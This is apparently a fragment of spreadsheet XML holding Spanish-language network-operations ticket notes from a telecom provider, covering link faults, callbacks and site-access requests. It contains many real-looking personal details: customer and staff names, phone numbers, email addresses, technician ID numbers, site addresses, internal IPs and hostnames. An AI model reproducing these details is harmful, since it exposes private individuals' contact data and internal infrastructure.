ADJUNTAMOS CAPTURA DONDE VEMOS LOS ERRORES QUE OBSERVAMOS EN LA INTERFAZ DONDE ESTA CONECTADA LA PLANTA TELEFÓNICA:
STATISTICS OF PRI1 INTERFACE
-------------RX----------TX----------
LOS  ALARMS: 0
LOF  ALARMS: 3
AIS  ALARMS: 1           0
RAI  ALARMS: 2           2
BER  ALARMS: 0
CODE ERRORS: 131070
FAS  ERRORS: 3
CRC  ERRORS: 0
FEBE ALARMS: 0
BER(LOCAL) : 0.00E+00
BER(REMOTE): 0.00E+00
TAMBIÉN ADJUNTAMOS PRUEBAS EN DONDE OBSERVAMOS QUE NUESTRO EQUIPO AETHRA, UBICACDO EN SUS INTALACIONES (EQUIPO QUE CONECTA HACIA SU PLANTA TELEFÓNICA) NO PRESENTA REINICIO ALGUNO DESDE HACE VARIO TIEMPO:
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\SYSTEM&gt;&gt;SHOW STATUS -S
SYSTEM IS RUNNING SINCE: 08/06/2022 11:47:45 -------------EQUIPO ENCENDIDO DESDE FECHA
DELAYED RESTART: NOT SCHEDULED
PCB TEMP:     +40.0 C
CPU TEMP:     +58.0 C
FAN1 SPEED:     0 RPM
FAN2 SPEED:     0 RPM
DAYLIGHT SAVING TIME IS ACTIVE.
COMMAND EXECUTED
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\SYSTEM&gt;&gt;DATE
DATE TUESDAY 14 JUNE 2022 TIME 13:04:02 -------------FECHA  QUE DEMUESTRA DONDE SE TOMO LA CAPTURA
COMMAND EXECUTED
AGREGAMOS, TAMBIÉN CAPTURA DE PING. DONDE NO OBSERVAMOS PERDIDAS DE PAQUETES EN EL SERVICIO.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4601246</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS RODRIGUEZ 78843777 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001170274 - 3001170604</t>
  </si>
  <si>
    <t>F4601269</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MIGUEL VELÁSQUEZ/CLIENTE 51119001 Y SE LE BRINDAN AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, POR EL MOMENTO ENLACE OK, A LA ESPERA QUE SE TERMINEN LOS TRABAJOS POR PARTE DE PERSONAL FO EN SITIO.</t>
  </si>
  <si>
    <t>F4601291</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE CORDOVA AL (504) 2239-6410 EXT. 4186 NO RESPONDE SE INTENTARA LUEGO **
-ID 3001144489
**</t>
  </si>
  <si>
    <t>**SE ENVIA CORREO A ESPERA DE RESPUESTA DE CLIENTE**
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 14:10
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;; JOSUE ADALBERTO CORDOVA ORTIZ &lt;JOSUE.CORDOVA@FICOHSA.COM&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;
CC: SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;
ASUNTO: RE: VALIDACION ENLACE INTERURBANDO TGU-SPS</t>
  </si>
  <si>
    <t>F4601313</t>
  </si>
  <si>
    <t>TECNICO EN SITIO SE LE BRINDA CONTACTO DE CLIENTE EN SITIO PARA QUE  LES DE ACCESO
BRYAN RODRIGUEZ - 22790909</t>
  </si>
  <si>
    <t>F4601320</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANDRA CONTRERAS 77409938 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001178507</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ANDRA CONTRERAS 77409938 ENVIA DIRECTO A BUZON
-ID 3001213434</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDRA CONTRERAS 77409938 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001207833</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SANDRA CONTRERAS 77409938 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001198893</t>
  </si>
  <si>
    <t>F4601323</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  ROBERTO VILLELA ENVIA A BUZON. SE REQUIERE QUE EL CLIENTE REINICIE LA PBX. SE INTENTARÁ CONTACTAR LUEGO.
3001161683
COLA:
NOMBRE: A: 0050488689938
NÚMERO: 0050488689938
DURACIÓN: 0:00:18
ESTADO: MARCANDO
DETALLES: 0050488689938
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 14:55:41</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RAMON VILLELA,  PERO INDICARON QUE ES NUMERO EQUIVOCADO.
3001227687, 3001227746.
COLA:
NOMBRE: A: 0050488689938
NÚMERO: 0050488689938
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 0050488689938
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 19:51:47</t>
  </si>
  <si>
    <t>F4601325</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A ROBERTO PARA PRUEBAS PERO NO RESPONDE---
88689938</t>
  </si>
  <si>
    <t>SE LLAMO A ROBERTO PARA PRUEBAS DE PRIMER NIVEL SIN EMBARGO ENVIA DIRECTO A BUZON--
88689938</t>
  </si>
  <si>
    <t>F4601336</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME ARGUETA 78032835 - 76818921 RESPONDEN CARLOS MENCIONA QUE EL SERVICIO YA RESTABLECIO
-ID 3001280224 - 3001280575</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE NO LOGRA RECIBIR EL CORREO, SE VALIDA QUE NO HAYA REBOTADO EL CORREO PERO TAMPOCO
-ID 3001180497</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 16:08
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; JARGUETA@DSASCORS.COM &lt;JARGUETA@DSASCORS.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | ID1276020SV | ATILISA S.A. DE C.V.
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>CLIENTE JAIME ARGUETA 78032835 MENCIONA QUE NO RECIBE EL CORREO POR LO QUE SOLICITA SE REENVIE A
--- JSERMENO@DSASTORES.COM  -------
-ID 3001180497</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME ARGUETA 78032835 MENCIONA QUE AUN NO HA RECIBIDO EL CORREO POR LO QUE CONFIRMA SU CORREO
----  JARGUETA@DSASCORES.COM ---
-ID 3001180497</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA A SITIO/ // QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 15:44
PARA: JARGUETA@DSASCORS.COM &lt;JARGUETA@DSASCORS.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | ID1276020SV | ATILISA S.A. DE C.V.
BUENA TARDE ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO .
DIRECCIÓN:  SAN LUIS TALPAAEROPUERTO INT. COMALAPAAREA DE SERV.MULTIPLES0LOCAL 2-11
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
00815933-2 10805 MANUEL GARCIA
04339969-2 10701 HECTOR IVAN
02085886-3 4492    JESUS OPICO CASTILLO
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE
SOLICITUD DE PERMISOS | ID1276020SV | ATILISA S.A. DE C.V.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 15:54
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; JARGUETA@DSASCORS.COM &lt;JARGUETA@DSASCORS.COM&gt;; JARGUETA@DSASCORES.COM &lt;JARGUETA@DSASCORES.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | ID1276020SV | ATILISA S.A. DE C.V.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4601337</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL 2420 7200 ID: 3001212027 ATIENDE MOISES INDICA QUE EL ATM NO ESTA CAÍDO, YA LO VE OPERATIVO PERO PRESENTA INESTABILIDAD CON TIEMPOSDE 137MS A 614MS, POR LO QUE AUTORIZA CIERRE DE LA F4601337 Y SE APERTURA TT SD1135132/F4601682 POR INESTABILIDAD*/*/*/*SE NOTIFICA A GESTOR SAMUEL.ESTRADAG QUE CIERRE LA F4601337*/*/*/</t>
  </si>
  <si>
    <t>F4601350</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SOLMER EDUARDO LOPEZ AL 32107325 SE LLAMA A CLIENTE PERO CORTA LLAMADA ||
SE INTENTARA LUEGO  **
ID 3001244148
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SOLMER EDUARDO LOPEZ 32107325 SOLICITA QUE SE LE LLAME EN 10 MIN **
ID 3001242713
**</t>
  </si>
  <si>
    <t>F4601357</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL RENATO LORENZANA 30246026 ID: 3001174397 INDICA QUE AÚN VE PERDIDAS DE PAQUETES, SE LE INFOMA QUE DE NUESTRO LADO EL SERVICIO ESTA ESTABLE Y SIN FALLAS, INDICA QUE ES MUY EXTRAÑO QUE CLARO NUNCA ENCUENTRE NADA EN LOS ENLACES REPORTADOS, PORQUE  ÉL ESTA HACIENDO PRUEBAS EN ESTE MOMENTO Y SI TIENE PERDIDAS, SE LE SOLICITA QUE NOS ENVÍE ESAS PRUEBAS, INDICA QUE NO ENVIARÁ NADA, HASTA QUE CLARO QUE ES POR OBLIGACIÓN LE TENEMOS QUE HACER LLEGAR LAS PRUEBAS DE NUESTRA SUPUESTA OPERATIVIDAD DEL SERVICIO, ESPERA QUE SE LE ENVÍE TODA LA INFORMACIÓN DE PRUEBAS POR CORREO*/*/*/*SE NOTIFICA A GESTOR DARWINH.ESPANA POR SKYPE Y SE CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>F4601366</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARGARITA PERO NO CONTESTA.
3001178738, 3001179330.
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:47
ESTADO: CONECTADA
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:47:05</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARGARITA PERO SIGUE SI CONTESTAR.
3001209158
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 17:34:58</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARGARITA PERO NO CONTESTA.
3001190681.3001190876
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 16:23:43
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:41
ESTADO: CONECTADA
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 16:23:25</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARGARITA PERO NO CONTESTA.
3001197291
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:39
ESTADO: CONECTADA
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 16:44:33</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MARGARITA CEBALLO QUIEN INDICA QUE YA POSEE LLAMADAS EN AMBAS VIAS. Y AUTORIZA EL CIERRE.
3001396130
COLA:
NOMBRE: A: 0050324297001
NÚMERO: 0050324297001
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: 0050324297001
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 15:00:59</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO MARTINEZ  78443544  MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 3001385216</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARGARITA PERO ENVIA A BUZON.
3001156516
COLA:
NOMBRE: A: 0050378416308
NÚMERO: 0050378416308
DURACIÓN: 0:00:06
ESTADO: CONECTADA
DETALLES: 0050378416308
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 14:39:15</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ROBERTO MARTINEZ QUIEN INDICA QUE NO ESTA EN LAS INSTALACIONES SOLICITA QUE SE LLAME A MARGARITA  :78416308
3001155863
COLA:
NOMBRE: A: 0050378443544
NÚMERO: 0050378443544
DURACIÓN: 0:00:09
ESTADO: MARCANDO
DETALLES: 0050378443544
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 14:37:43</t>
  </si>
  <si>
    <t>F4601371</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE SAMUEL VILLALTA 70667941 PARA ADELANTAR LAS PRUEBAS SIN EMBARGO NOS ENVIA A BUZON DIRECTO EN VARIAS OCASIONES
##LLAMADA DESDE VIVO
A LA ESPERA DE LA INFORMACION DE DX SV</t>
  </si>
  <si>
    <t>F4601384</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO PARA REVISION DE EQUIPOS ENLACE PRINCIPAL, Y APLICAR REINICIO, POSIBLEMENTE EQUIPO AETHRA INHIBIDO YA QUE NO LLEGA MAC ADD A PUERTO MSAN, SE DESCARTA PROBLEMAS DEL LADO DE CLARO.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA EL ATM: CC_TYT_GT_ATM0421, SOLICITAMOS SU APOYO VALIDANDO EQUIPOS EN ATM (ENERGIZADOS Y DE SER POSIBLE APLICAR REINICIO) PARA ENLACE PRINCIPAL, ACTUALMENTE OPERATIVO ÚNICAMENTE POR REDUNDANCIA 3G. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMO A 5B CONTESTO HECTOR, COMENTA QUE ENVIARA A SUPERVISOR, SOLICITA QUE SE LLAME MAÑANA A LAS 10 AM PARA CONOCER LOS DETALLES DE LA VISITA QUE HARA PERSONAL DE TAVSA A PUNTO REMOTO TOMAR EN CUENTA QUE YA SE REVISO MSAN VLAN CREADA PUERTO UP SE APLICO RESET SOBRE LA INTERFACE, NO SE LLEGA A NIVEL DE PING AL AETRHA NO SE LE TIENE GESTION, POSIBLEMENTE REQUIERA UN RESET FISICO EL AEHTRA, SUBE LA MAC DEL PE AL SW DE ACCESO, CPE ACTIVO PR REDUNDANCIA. DE SER NECESARIO SE ENVIARA A PERSONAL TECNICO.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:02
FIN: HOY, 18:12
DURACIÓN: 9:12
ID DE LLAMADA: 3001214900
SE VALIDA QUE LA MAC DE PE SUBE AL SW DE ACCESO 10.105.51.80 NO SUBE LA MAC DE LA INTERFACE DEL CPE
&lt;QCOAGTTEN1C1101A01ENM1&gt;DISPLAY MAC-ADDRESS DYNAMIC VLAN 10
MAC ADDRESS TABLE OF SLOT 0:
-------------------------------------------------------------------------------
MAC ADDRESS    VLAN/       PEVLAN CEVLAN PORT            TYPE      LSP/LSR-ID
               VSI/SI                                              MAC-TUNNEL
-------------------------------------------------------------------------------
00A0-26C6-646F 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-570D 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-609D 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
8CFD-18AA-698B 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-6239 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-F968-2603 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-63CF 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-5411 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
0000-5E00-0158 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
341E-6B53-1AD8 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
0000-5E00-0196 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-F968-2793 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-5DC9 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
8C68-3A15-E40C 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-6415 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
00A0-26C6-606F 10          -      -      ETH-TRUNK1      DYNAMIC   0/-
-------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 14 DE JUNIO DE 2022 14:48PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL ALARMADO PARA CLIENTE "CC_TYT_GT_ATM042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1384
ID: 47500583T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0421
UBICADO EN:  CAJERO 3641 FARMACIA GALENO 126, 6 AV. 7-004 ZONA 1 MAZATE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE ANTHONY GARCIA DE 5B INFORMA QUE SE VALIDARA FALLA EL DIA DE MAÑANA
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
SE VALIDARA FALLA EL DÍA DE MAÑANA.A
SALUDOS CORDIALES.
ANTHONY GARCIA
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4601386</t>
  </si>
  <si>
    <t>F4601389</t>
  </si>
  <si>
    <t>SE LLAMA A JULIO PARA PRUEBAS DE PRIMER NIVEL PERO NO RESPOMNDE--
78082167</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO MARTINEZ 78082167 ,QUIEN COFIRMA EL SERVICIO OPERATIVO E INDICA QUE SE PUEDE PROCEDER CON EL CIERRE
RESULTADO: LLAMADA HECHA
NOMBRE: 50578082167
NÚMERO: 50578082167
INICIO: HOY, 10:47
FIN: HOY, 10:48
DURACIÓN: 1:12
ID DE LLAMADA: 3001305596</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JULIO AL 78082167 INDICA QUE YA NO SE ENCUENTRA EN SITIO PERO QUE REINICIO EQUIPOS QUE VERIFICO CONEXIONES Y NO LEVANTA EL SERVICIO CL SOLICITA VISITA TECNICA PARA MAÑANA Y QUE SE LE AVISE CON ANTICIPACION YA QUE EL LLEGA O EN LA MAÑANA O SOLO EN LA TARDE || SE NOTIFICA A GETOR **
HORARIO DE ATENCION: 8:00 A 12:00 O DE 13:00 A 16:30 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS.
DIRECCION:KM 58 CARRETERA A NATAYME EMANUEL MULGALO
ATENDERA EN SITIO:JULIO
ID 3001200059
**</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A JULIO PARA PRUEBAS PERO NO RESPONDE --
78082167</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO MARTINEZ 78082167 NO RESPONDE | SE INTENTARA LUEGO **
-ID 3001171942 - 3001172085
**</t>
  </si>
  <si>
    <t>F4601398</t>
  </si>
  <si>
    <t>TICKET APERTURADO A SOLICITUD DE GESTIÓN CLARO N1/CONSULTORÍA PARA REVISIÓN DEL SERVICIO, DAR SEGUIMIENTO MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>F4601400</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE BONILLA 74786377 - 24200018 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001192580 - 3001192991</t>
  </si>
  <si>
    <t>F4601407</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JAIME MEJIVAR 70716300 QUIEN VALIDA QUE YA RECIBE LLAMADAS A SU GDN AUTORIZA EL CIERRE DEL CASO
3001246677
COLA:
NOMBRE: A: 0050328904200
NÚMERO: 0050328904200
DURACIÓN: 0:03:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050328904200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 15/06/2022 08:08:12 A. M.</t>
  </si>
  <si>
    <t>F4601410</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 15:14
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100022T::: TICKET CNOC IMBBL004284 ::: "FUERA DE SERVICIO "
BUENOS DÍAS, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN 10.87.195.114 DE PUNTO REMOTO.
QUEDAREMOS ATENTOS A SUS COMENTARIOS PARA PODER PROCEDER AL CIERRE DEL CASO YA QUE POR PARTE DE CLARO NO HAY ACCIONES QUE REALIZAR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE CONFIRMA CIERRE POR CORREO*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 17:40
PARA: HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100022T::: TICKET CNOC IMBBL004284 ::: "FUERA DE SERVICIO "
BUENAS TARDES RAÚL,
            AGRADECEMOS POR SU AUTORIZACIÓN, HEMOS PROCEDIDO CON EL CIERRE DEL TICKET SD1135062.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
--------------------------------------------------------------------
DE: HERNANDEZ CERVANTES SANTIAGO RAUL [MAILTO:SHCERVAN@UNINET.COM.MX]
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 17:35
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 426100022T::: TICKET CNOC IMBBL004284 ::: "FUERA DE SERVICIO "
BUENA TARDE ESTIMADOS,
EL SERVICIO SE ENCUENTRA OPERATIVO POR FAVOR PROCEDER CON EL CIERRE.</t>
  </si>
  <si>
    <t>F4601412</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE ACCESOS A CLIENTE
GESTION DE ACCESOS F4601412| IP2383058SV | BANCO DAVIVIENDA SALVADOREÑO S.A. | CARRETERA SANTA ANA KM 26.5 COMPLEJO INDUSTRIAL INTERCOMPLEX, ZONA LOURDES DENTRO DE FABRICA
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
MAR 14/06/2022 16:32
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
